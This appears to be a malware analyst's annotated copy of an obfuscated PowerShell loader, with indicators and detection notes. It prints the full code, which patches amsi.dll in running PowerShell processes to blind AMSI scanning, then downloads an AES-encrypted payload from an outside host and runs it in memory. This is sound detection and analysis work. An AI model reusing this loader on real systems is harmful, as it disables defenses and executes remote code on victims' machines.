# Analyst annotation of an obfuscated PowerShell loader. Variable and function names are
# meaningless filler. The line breaks below were reconstructed from a whitespace-collapsed
# copy; the code tokens are unchanged.
#
# Stages visible in this sample:
#   1. Force-terminates the parent of the current PowerShell process.
#   2. Compiles P/Invoke wrappers for cross-process memory access (class K).
#   3. Walks every process named "powershell", locates amsi.dll, searches it for a 32-byte
#      code signature and overwrites 3 bytes at signature offset 0x1b.
#   4. Sets a persistent BUILD environment variable, downloads a blob over HTTPS, decrypts it
#      with a hard-coded AES key/IV, and loads and runs it as an in-memory .NET assembly.
#
# Indicators present in the sample:
#   URL      https://sdfas-cloud.b-cdn.net/wqegfasd.bin
#   AES key  X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0   (32 bytes, UTF-8)
#   AES IV   K9mW3pQ7tR2vL8nY                   (16 bytes, UTF-8)
#   Env var  BUILD=Titan (written with setx)
#   Marker   #ujhifsfiohdf
#
# Detection notes:
#   - Script block logging (event 4104) captures the Add-Type source and the byte arrays.
#   - Process-access telemetry: powershell.exe opening other powershell.exe processes with
#     mask 0x001F0FFF, followed by a protection change and a write inside amsi.dll.
#   - Comparing in-memory amsi.dll code with the on-disk image exposes the patch; the
#     script never restores the original page protection.
#   - The hard-coded key/IV allow offline decryption of a captured payload for analysis.

# Stage 1: read this process's ParentProcessId via CIM and force-kill that parent if the
# lookup returned a value. PowerShell terminating its own parent is uncommon and worth alerting on.
$yew = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId
if ($yew) { Stop-Process -Id $yew -Force }

# Stage 2: compile a C# class K exposing four kernel32.dll imports: VirtualProtectEx,
# ReadProcessMemory, OpenProcess and WriteProcessMemory. No CloseHandle import is declared,
# so handles opened later cannot be closed through this class.
Add-Type @"
using System; using System.Runtime.InteropServices; public class K { [DllImport("kernel32.dll", SetLastError=true)] public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint a, bool i, int p); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w); }
"@

# Stage 3: in-memory tampering with amsi.dll in every process named "powershell".
function KJhbhb {
    # Random 50-100 ms pauses are inserted between steps (Get-Random's -Maximum is exclusive).
    Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
    $basin = Get-Process -Name "powershell" -ErrorAction SilentlyContinue
    # No matching process: the whole script exits with code 1, so stage 4 never runs.
    if (!$basin) { exit 1 }
    foreach ($chasm in $basin) {
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        # 0x001F0FFF is the legacy PROCESS_ALL_ACCESS mask. $mead is never assigned in the
        # visible text, so the inherit-handle argument evaluates to $null here.
        # The returned handle is not checked for failure.
        $brook = [K]::OpenProcess(0x001F0FFF, $mead, $chasm.Id)
        $drift = $null
        $horizon = 0
        # Find amsi.dll among the target's loaded modules; keep its base address and size.
        foreach ($wave in $chasm.Modules) {
            if ($wave.ModuleName -eq "amsi.dll") {
                $drift = $wave.BaseAddress
                $horizon = $wave.ModuleMemorySize
                break
            }
        }
        # Targets without amsi.dll loaded are skipped.
        if (!$drift) { continue }
        $veil = [byte[]]::new(32)
        # 32-byte x64 code signature to search for; presumably the prologue of an AMSI
        # scan routine -- confirm against the amsi.dll build under analysis.
        $sky = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b)
        $knoll = $null
        # Read the module in 32-byte steps from offset 0 through $horizon inclusive and
        # compare each chunk with the signature. Read results are not checked.
        for ($apple = 0; $apple -le $horizon; $apple += 32) {
            $temple = [IntPtr]::Zero
            [K]::ReadProcessMemory($brook, [IntPtr]($drift.ToInt64() + $apple), $veil, 32, [ref]$temple)
            # NOTE(review): $anchor and $mead are not assigned anywhere in the visible text,
            # so the match flag $cedar evaluates falsy on every path as shown. Their
            # definitions may have been lost in extraction or live elsewhere -- confirm
            # before concluding whether the patch below is ever reached.
            $cedar = $anchor
            for ($mist = 0; $mist -lt 32; $mist++) {
                if ($veil[$mist] -ne $sky[$mist]) { $cedar = $mead; break }
            }
            if ($cedar) { $knoll = [IntPtr]($drift.ToInt64() + $apple); break }
        }
        # No signature match recorded: leave this process untouched.
        if (!$knoll) { continue }
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $quest = 0
        # Sets protection 0x40 (PAGE_EXECUTE_READWRITE) on 0x1000 bytes starting at the
        # module base ($drift), not at the match address. The old protection is stored in
        # $quest but never restored, leaving an RWX page in amsi.dll as an artifact.
        [K]::VirtualProtectEx($brook, $drift, 0x1000, 0x40, [ref]$quest)
        # Overwrites the 3 bytes at signature offset 0x1b (0x41,0x8b,0xf8 in $sky) with
        # 0x31,0xff,0x90. The intended effect appears to be neutralising AMSI content
        # scanning in the target process. The write result is not checked.
        $willow = [byte[]]@(0x31,0xff,0x90)
        $rune = 0
        [K]::WriteProcessMemory($brook, [IntPtr]($knoll.ToInt64() + 0x1b), $willow, 3, [ref]$rune)
    }
}
KJhbhb
# Marker comment from the sample; it brackets the final stage and is usable as a string indicator.
#ujhifsfiohdf
# Stage 4: setx persists BUILD=Titan as an environment variable (by default in the
# per-user environment), possibly a campaign or build tag.
setx BUILD "Titan"
# Download the encrypted payload into memory; nothing is written to disk by this script.
$house = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin"
$yarrow = [System.Net.WebClient]::new()
$stream = $yarrow.DownloadData($house)
# AES with a hard-coded 32-byte key and 16-byte IV. Mode and padding are left at the
# Aes.Create() defaults.
$gorge = [System.Security.Cryptography.Aes]::Create()
$zebra = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0")
$wick = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY")
$gorge.Key = $zebra
$gorge.IV = $wick
$ledge = $gorge.CreateDecryptor()
$rim = $ledge.TransformFinalBlock($stream, 0, $stream.Length)
# The decrypted bytes are loaded as a .NET assembly straight from memory and its entry
# point is invoked with no target object and no arguments.
$sage = [System.Reflection.Assembly]::Load($rim)
$moor = $sage.EntryPoint
$moor.Invoke($null, $null)
#ujhifsfiohdf